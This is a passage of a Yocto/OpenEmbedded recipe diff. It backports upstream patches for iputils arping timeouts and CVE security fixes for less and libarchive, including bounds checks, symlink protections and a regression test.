++ /* interval timerfd */
+ tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+ if (tfd == -1) {
+ error(0, errno, "timerfd_create failed");
+@@ -722,6 +730,19 @@ static int event_loop(struct run_state *ctl)
+ pfds[POLLFD_TIMER].fd = tfd;
+ pfds[POLLFD_TIMER].events = POLLIN | POLLERR | POLLHUP;
+
++ /* timeout timerfd */
++ timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);
++ if (tfd == -1) {
++ error(0, errno, "timerfd_create failed");
++ return 1;
++ }
++ if (timerfd_settime(timeoutfd, 0, &timeoutfd_vals, NULL)) {
++ error(0, errno, "timerfd_settime failed");
++ return 1;
++ }
++ pfds[POLLFD_TIMEOUT].fd = timeoutfd;
++ pfds[POLLFD_TIMEOUT].events = POLLIN | POLLERR | POLLHUP;
++
+ /* socket */
+ pfds[POLLFD_SOCKET].fd = ctl->socketfd;
+ pfds[POLLFD_SOCKET].events = POLLIN | POLLERR | POLLHUP;
+@@ -764,13 +785,15 @@ static int event_loop(struct run_state *ctl)
+ continue;
+ }
+ total_expires += exp;
+- if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
++ if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
+ exit_loop = 1;
+ continue;
+ }
+ send_pack(ctl);
+ break;
++ case POLLFD_TIMEOUT:
++ exit_loop = 1;
++ break;
+ case POLLFD_SOCKET:
+ if ((s =
+ recvfrom(ctl->socketfd, packet, sizeof(packet), 0,
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils_s20190709.bb b/meta/recipes-extended/iputils/iputils_s20190709.bb
index 545f3d5e87..a715d0a37b 100644
--- a/meta/recipes-extended/iputils/iputils_s20190709.bb
+++ b/meta/recipes-extended/iputils/iputils_s20190709.bb
@@ -10,11 +10,17 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390"
DEPENDS = "gnutls"
-SRC_URI = "git://github.com/iputils/iputils \
+SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \
file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \
file://0001-ninfod-fix-systemd-Documentation-url-error.patch \
file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \
file://0001-iputils-Initialize-libgcrypt.patch \
+ file://0001-arping-revert-partially-fix-sent-vs-received-package.patch \
+ file://0002-arping-fix-f-quit-on-first-reply-regression.patch \
+ file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \
+ file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \
+ file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \
+ file://0001-arping-make-update-neighbours-work-again.patch \
"
SRCREV = "13e00847176aa23683d68fce1d17ffb523510946"
diff --git a/meta/recipes-extended/less/less/CVE-2022-48624.patch b/meta/recipes-extended/less/less/CVE-2022-48624.patch
new file mode 100644
index 0000000000..409730bd4f
--- /dev/null
+++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch
@@ -0,0 +1,41 @@
+From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001
+From: Mark Nudelman <markn@greenwoodsoftware.com>
+Date: Sat, 25 Jun 2022 11:54:43 -0700
+Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE.
+
+Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144]
+CVE: CVE-2022-48624
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ filename.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/filename.c b/filename.c
+index 5824e385..dff20c08 100644
+--- a/filename.c
++++ b/filename.c
+@@ -972,6 +972,8 @@ close_altfile(altfilename, filename)
+ {
+ #if HAVE_POPEN
+ char *lessclose;
++ char *qfilename;
++ char *qaltfilename;
+ FILE *fd;
+ char *cmd;
+ int len;
+@@ -986,9 +988,13 @@ close_altfile(altfilename, filename)
+ error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG);
+ return;
+ }
+- len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2);
++ qfilename = shell_quote(filename);
++ qaltfilename = shell_quote(altfilename);
++ len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2);
+ cmd = (char *) ecalloc(len, sizeof(char));
+- SNPRINTF2(cmd, len, lessclose, filename, altfilename);
++ SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename);
++ free(qaltfilename);
++ free(qfilename);
+ fd = shellcmd(cmd);
+ free(cmd);
+ if (fd != NULL)
diff --git a/meta/recipes-extended/less/less_551.bb b/meta/recipes-extended/less/less_551.bb
index a818c68fc7..401f40bed5 100644
--- a/meta/recipes-extended/less/less_551.bb
+++ b/meta/recipes-extended/less/less_551.bb
@@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
DEPENDS = "ncurses"
SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \
+ file://CVE-2022-48624.patch \
"
SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819"
diff --git a/meta/recipes-extended/libaio/libaio_0.3.111.bb b/meta/recipes-extended/libaio/libaio_0.3.111.bb
index 8e1cd349a0..309ae53bfb 100644
--- a/meta/recipes-extended/libaio/libaio_0.3.111.bb
+++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499"
-SRC_URI = "git://pagure.io/libaio.git;protocol=https \
+SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \
file://00_arches.patch \
file://destdir.patch \
file://libaio_fix_for_mips_syscalls.patch \
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
new file mode 100644
index 0000000000..555c7a47f7
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
@@ -0,0 +1,183 @@
+Description: Fix handling of symbolic link ACLs
+ Published as CVE-2021-23177
+Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad
+Bug-Debian: https://bugs.debian.org/1001986
+Author: Martin Matuska <martin@matuska.org>
+Last-Updated: 2021-12-20
+
+CVE: CVE-2021-23177
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_disk_acl_freebsd.c
++++ b/libarchive/archive_disk_acl_freebsd.c
+@@ -319,7 +319,7 @@
+
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ int acl_type = 0;
+@@ -364,6 +364,13 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+ acl = acl_init(entries);
+ if (acl == (acl_t)NULL) {
+ archive_set_error(a, errno,
+@@ -542,7 +549,10 @@
+ else if (acl_set_link_np(name, acl_type, acl) != 0)
+ #else
+ /* FreeBSD older than 8.0 */
+- else if (acl_set_file(name, acl_type, acl) != 0)
++ else if (S_ISLNK(mode)) {
++ /* acl_set_file() follows symbolic links, skip */
++ ret = ARCHIVE_OK;
++ } else if (acl_set_file(name, acl_type, acl) != 0)
+ #endif
+ {
+ if (errno == EOPNOTSUPP) {
+@@ -677,14 +687,14 @@
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ if (ret != ARCHIVE_OK)
+ return (ret);
+ }
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+
+ /* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -693,7 +703,7 @@
+ #if ARCHIVE_ACL_FREEBSD_NFS4
+ else if ((archive_acl_types(abstract_acl) &
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ }
+ #endif
+--- a/libarchive/archive_disk_acl_linux.c
++++ b/libarchive/archive_disk_acl_linux.c
+@@ -343,6 +343,11 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support RichACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
+ richacl = richacl_alloc(entries);
+ if (richacl == NULL) {
+ archive_set_error(a, errno,
+@@ -455,7 +460,7 @@
+ #if ARCHIVE_ACL_LIBACL
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ int acl_type = 0;
+@@ -488,6 +493,18 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support ACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+ acl = acl_init(entries);
+ if (acl == (acl_t)NULL) {
+ archive_set_error(a, errno,
+@@ -727,14 +744,14 @@
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ if (ret != ARCHIVE_OK)
+ return (ret);
+ }
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+ }
+ #endif /* ARCHIVE_ACL_LIBACL */
+--- a/libarchive/archive_disk_acl_sunos.c
++++ b/libarchive/archive_disk_acl_sunos.c
+@@ -443,7 +443,7 @@
+
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ aclent_t *aclent;
+@@ -467,7 +467,6 @@
+ if (entries == 0)
+ return (ARCHIVE_OK);
+
+-
+ switch (ae_requested_type) {
+ case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E:
+ cmd = SETACL;
+@@ -492,6 +491,12 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Skip ACLs on symbolic links */
++ ret = ARCHIVE_OK;
++ goto exit_free;
++ }
++
+ e = 0;
+
+ while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type,
+@@ -801,7 +806,7 @@
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ /* Solaris writes POSIX.1e access and default ACLs together */
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e");
+
+ /* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -810,7 +815,7 @@
+ #if ARCHIVE_ACL_SUNOS_NFS4
+ else if ((archive_acl_types(abstract_acl) &
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ }
+ #endif
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
new file mode 100644
index 0000000000..c4a2fb612c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
@@ -0,0 +1,23 @@
+Description: Never follow symlinks when setting file flags on Linux
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -3927,7 +3927,8 @@
+
+ /* If we weren't given an fd, open it ourselves. */
+ if (myfd < 0) {
+- myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC);
++ myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY |
++ O_CLOEXEC | O_NOFOLLOW);
+ __archive_ensure_cloexec_flag(myfd);
+ }
+ if (myfd < 0)
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
new file mode 100644
index 0000000000..0dfcd1ac5c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
@@ -0,0 +1,172 @@
+Description: Do not follow symlinks when processing the fixup list
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -556,6 +556,7 @@
+ libarchive/test/test_write_disk.c \
+ libarchive/test/test_write_disk_appledouble.c \
+ libarchive/test/test_write_disk_failures.c \
++ libarchive/test/test_write_disk_fixup.c \
+ libarchive/test/test_write_disk_hardlink.c \
+ libarchive/test/test_write_disk_hfs_compression.c \
+ libarchive/test/test_write_disk_lookup.c \
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -2461,6 +2461,7 @@
+ {
+ struct archive_write_disk *a = (struct archive_write_disk *)_a;
+ struct fixup_entry *next, *p;
++ struct stat st;
+ int fd, ret;
+
+ archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC,
+@@ -2478,6 +2479,20 @@
+ (TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) {
+ fd = open(p->name,
+ O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC);
++ if (fd == -1) {
++ /* If we cannot lstat, skip entry */
++ if (lstat(p->name, &st) != 0)
++ goto skip_fixup_entry;
++ /*
++ * If we deal with a symbolic link, mark
++ * it in the fixup mode to ensure no
++ * modifications are made to its target.
++ */
++ if (S_ISLNK(st.st_mode)) {
++ p->mode &= ~S_IFMT;
++ p->mode |= S_IFLNK;
++ }
++ }
+ }
+ if (p->fixup & TODO_TIMES) {
+ set_times(a, fd, p->mode, p->name,
+@@ -2492,7 +2507,12 @@
+ fchmod(fd, p->mode);
+ else
+ #endif
+- chmod(p->name, p->mode);
++#ifdef HAVE_LCHMOD
++ lchmod(p->name, p->mode);
++#else
++ if (!S_ISLNK(p->mode))
++ chmod(p->name, p->mode);
++#endif
+ }
+ if (p->fixup & TODO_ACLS)
+ archive_write_disk_set_acls(&a->archive, fd,
+@@ -2503,6 +2523,7 @@
+ if (p->fixup & TODO_MAC_METADATA)
+ set_mac_metadata(a, p->name, p->mac_metadata,
+ p->mac_metadata_size);
++skip_fixup_entry:
+ next = p->next;
+ archive_acl_clear(&p->acl);
+ free(p->mac_metadata);
+@@ -2643,6 +2664,7 @@
+ fe->next = a->fixup_list;
+ a->fixup_list = fe;
+ fe->fixup = 0;
++ fe->mode = 0;
+ fe->name = strdup(pathname);
+ return (fe);
+ }
+--- a/libarchive/test/CMakeLists.txt
++++ b/libarchive/test/CMakeLists.txt
+@@ -208,6 +208,7 @@
+ test_write_disk.c
+ test_write_disk_appledouble.c
+ test_write_disk_failures.c
++ test_write_disk_fixup.c
+ test_write_disk_hardlink.c
+ test_write_disk_hfs_compression.c
+ test_write_disk_lookup.c
+--- /dev/null
++++ b/libarchive/test/test_write_disk_fixup.c
+@@ -0,0 +1,77 @@
++/*-
++ * Copyright (c) 2021 Martin Matuska
++ * All rights reserved.
++ *
++ * Redistribution and use in source and binary forms, with or without
++ * modification, are permitted provided that the following conditions
++ * are met:
++ * 1. Redistributions of source code must retain the above copyright
++ * notice, this list of conditions and the following disclaimer.
++ * 2. Redistributions in binary form must reproduce the above copyright
++ * notice, this list of conditions and the following disclaimer in the
++ * documentation and/or other materials provided with the distribution.
++ *
++ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
++ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
++ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
++ * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
++ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
++ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
++ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
++ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
++ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
++ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
++ */
++#include "test.h"
++
++/*
++ * Test fixup entries don't follow symlinks
++ */
++DEFINE_TEST(test_write_disk_fixup)
++{
++ struct archive *ad;
++ struct archive_entry *ae;
++ int r;
++
++ if (!canSymlink()) {
++ skipping("Symlinks not supported");
++ return;
++ }
++
++ /* Write entries to disk. */
++ assert((ad = archive_write_disk_new()) != NULL);
++
++ /*
++ * Create a file
++ */
++ assertMakeFile("victim", 0600, "a");
++
++ /*
++ * Create a directory and a symlink with the same name
++ */
++
++ /* Directory: dir */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFDIR | 0606);
++ assertEqualIntA(ad, 0, archive_write_header(ad, ae));
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ /* Symbolic Link: dir -> foo */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFLNK | 0777);
++ archive_entry_set_size(ae, 0);
++ archive_entry_copy_symlink(ae, "victim");
++ assertEqualIntA(ad, 0, r = archive_write_header(ad, ae));
++ if (r >= ARCHIVE_WARN)
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ assertEqualInt(ARCHIVE_OK, archive_write_free(ad));
++
++ /* Test the entries on disk. */
++ assertIsSymlink("dir", "victim", 0);
++ assertFileMode("victim", 0600);
++}
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
new file mode 100644
index 0000000000..fca53fc9b6
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
@@ -0,0 +1,321 @@
+From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 09:08:13 +0100
+Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files
+
+Added more range checks in the bit stream reading functions
+(read_bits_16 and read_bits_32) in order to better guard against out of
+memory reads.
+
+This commit contains a test with OSSFuzz sample #30448.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 108 ++++++++++--------
+ libarchive/test/test_read_format_rar5.c | 16 +++
+ ...r5_decode_number_out_of_bounds_read.rar.uu | 10 ++
+ 4 files changed, 89 insertions(+), 46 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \
+ libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
++ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive
+ return ret;
+ }
+
+-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) {
++static int read_bits_32(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint32_t* value)
++{
++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_PROGRAMMER,
++ "Premature end of stream during extraction of data (#1)");
++ return ARCHIVE_FATAL;
++ }
++
+ uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24;
+ bits |= p[rar->bits.in_addr + 1] << 16;
+ bits |= p[rar->bits.in_addr + 2] << 8;
+@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar
+ return ARCHIVE_OK;
+ }
+
+-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) {
++static int read_bits_16(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint16_t* value)
++{
++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_PROGRAMMER,
++ "Premature end of stream during extraction of data (#2)");
++ return ARCHIVE_FATAL;
++ }
++
+ int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16;
+ bits |= (int) p[rar->bits.in_addr + 1] << 8;
+ bits |= (int) p[rar->bits.in_addr + 2];
+@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar,
+ }
+
+ /* n = up to 16 */
+-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n,
+- int* value)
++static int read_consume_bits(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, int n, int* value)
+ {
+ uint16_t v;
+ int ret, num;
+@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5
+ return ARCHIVE_FATAL;
+ }
+
+- ret = read_bits_16(rar, p, &v);
++ ret = read_bits_16(a, rar, p, &v);
+ if(ret != ARCHIVE_OK)
+ return ret;
+
+@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t*
+ static int decode_number(struct archive_read* a, struct decode_table* table,
+ const uint8_t* p, uint16_t* num)
+ {
+- int i, bits, dist;
++ int i, bits, dist, ret;
+ uint16_t bitfield;
+ uint32_t pos;
+ struct rar5* rar = get_context(a);
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) {
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) {
++ return ret;
+ }
+
+ bitfield &= 0xfffe;
+@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r
+ for(i = 0; i < HUFF_TABLE_SIZE;) {
+ uint16_t num;
+
+- if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) {
+- /* Truncated data, can't continue. */
+- archive_set_error(&a->archive,
+- ARCHIVE_ERRNO_FILE_FORMAT,
+- "Truncated data in huffman tables (#2)");
+- return ARCHIVE_FATAL;
+- }
+-
+ ret = decode_number(a, &rar->cstate.bd, p, &num);
+ if(ret != ARCHIVE_OK) {
+ archive_set_error(&a->archive,
+@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r
+ /* 16..17: repeat previous code */
+ uint16_t n;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++ return ret;
+
+ if(num == 16) {
+ n >>= 13;
+@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r
+ /* other codes: fill with zeroes `n` times */
+ uint16_t n;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++ return ret;
+
+ if(num == 18) {
+ n >>= 13;
+@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc
+ }
+
+ /* Convenience function used during filter processing. */
+-static int parse_filter_data(struct rar5* rar, const uint8_t* p,
+- uint32_t* filter_data)
++static int parse_filter_data(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint32_t* filter_data)
+ {
+- int i, bytes;
++ int i, bytes, ret;
+ uint32_t data = 0;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes)))
++ return ret;
+
+ bytes++;
+
+ for(i = 0; i < bytes; i++) {
+ uint16_t byte;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) {
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) {
++ return ret;
+ }
+
+ /* Cast to uint32_t will ensure the shift operation will not
+@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r
+ uint16_t filter_type;
+ struct filter_info* filt = NULL;
+ struct rar5* rar = get_context(ar);
++ int ret;
+
+ /* Read the parameters from the input stream. */
+- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start)))
++ return ret;
+
+- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length)))
++ return ret;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type)))
++ return ret;
+
+ filter_type >>= 13;
+ skip_bits(rar, 3);
+@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r
+ if(filter_type == FILTER_DELTA) {
+ int channels;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels)))
++ return ret;
+
+ filt->channels = channels + 1;
+ }
+@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r
+ return ARCHIVE_OK;
+ }
+
+-static int decode_code_length(struct rar5* rar, const uint8_t* p,
+- uint16_t code)
++static int decode_code_length(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint16_t code)
+ {
+ int lbits, length = 2;
++
+ if(code < 8) {
+ lbits = 0;
+ length += code;
+@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar
+ if(lbits > 0) {
+ int add;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add))
++ if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add))
+ return -1;
+
